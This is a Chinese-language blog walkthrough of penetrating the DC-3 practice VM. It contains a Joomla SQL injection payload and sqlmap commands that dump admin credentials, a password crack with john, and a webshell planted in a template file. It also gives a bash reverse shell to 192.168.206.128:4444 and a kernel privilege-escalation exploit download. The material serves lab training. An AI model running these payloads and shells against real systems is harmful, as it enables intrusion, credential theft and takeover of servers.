DC-3靶机渗透实战

DC-3靶机渗透

咱们速战速决!我尽量详细一点
打开靶机,nat模式,nmap主机发现,全扫描
DC-3靶机渗透实战_第1张图片
80端口,joomla 框架,打开御剑扫描器扫到后台路径和README.txt文件
获得了版本
在这里插入图片描述
这个版本有个sql注入漏洞,直接找来payload验证一下
index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)
在这里插入图片描述确实存在注入漏洞
直接上sqlmap
sqlmap -u "http://192.168.206.143/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=*
" --risk 3 --level 5 --dbs
拿到管理员账号:
sqlmap -u “http://192.168.206.143/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=*” --risk 3 -D joomladb -T “#__users” -C username,password --dump
在这里插入图片描述
这里我测试一下,还有另一种方法,我们数据库所在的账号是dba,直接写一句话木马
这里用hash爆破一下口令,把加密的hash串保存成txt文件,然后kali自带的john,输入命令john 文件名
爆破出来为snoopy,???????????????
然后登陆后台
DC-3靶机渗透实战_第2张图片
找到Protostar 这个模板,然后进去改index.php文件内容,当然你随便改哪个php文件都可,加入一句话
DC-3靶机渗透实战_第3张图片
保存,并退出,这里我刚开始上了一个get的,菜刀蚁剑怎么都连不上,后面我换了一个post就可以了
DC-3靶机渗透实战_第4张图片
验证一下,然后蚁剑连
cmd下
反弹shell
bash -c ‘sh -i &>/dev/tcp/192.168.206.128/4444 0>&1’
用nc均没有成功,就这个可以
然后连上去了,发现是网站用户,各种suid提权没成功,发现内核版本为ubentu16. 内核4.4
用内核提权
提权exp
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

解压里面的exploit压缩包,用另一个压缩包没成功
然后把doubleput.c本地编译成二进制文件,把所有文件都上传到服务器
先授权给sh脚本
在这里插入图片描述
记得把所有的.c文件都上传,除了doubleput.c,上传编译好的脚本
DC-3靶机渗透实战_第5张图片成功读取flag文件

DC-3靶机渗透实战_第6张图片

最近在忙自己的博客,没学过node.js,感觉配置起来好难,弄好了,写一个搭建指南吧!

你可能感兴趣的:(DC,信息安全)